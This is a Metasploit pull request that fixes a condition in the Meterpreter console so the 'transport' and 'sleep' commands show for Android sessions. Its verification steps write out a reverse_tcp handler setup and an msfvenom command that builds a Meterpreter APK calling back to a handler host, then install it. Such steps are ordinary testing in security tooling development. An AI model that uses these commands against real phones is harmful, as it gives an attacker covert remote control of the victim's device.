### PR TITLE
fix sleep and transport on android

### DIFF
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -95,7 +95,7 @@ class Console::CommandDispatcher::Core
     # the platform update feature we can remove some of these conditions
     if client.platform == 'windows' || client.platform == 'linux' ||
         client.platform == 'python' || client.platform == 'java' ||
-        client.arch == ARCH_PYTHON || (client.arch == ARCH_JAVA && client.platform != 'android')
+        client.arch == ARCH_PYTHON || client.platform == 'android'
       # Yet to implement transport hopping for other meterpreters.
       c["transport"] = "Change the current transport mechanism"
 


### PR DESCRIPTION
It looks like we are hiding the transport and sleep command on Android for some reason. This change adds it back.

## Verification

- [x] Get an Android meterpreter session:

```
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
...
./msfvenom -p android/meterpreter/reverse_tcp -f raw LHOST=HANDLERIP LPORT=4444 > android.apk
./tools/exploit/install_msf_apk.sh android.apk
```

- [x] **Verify** `meterpreter> sleep ` works

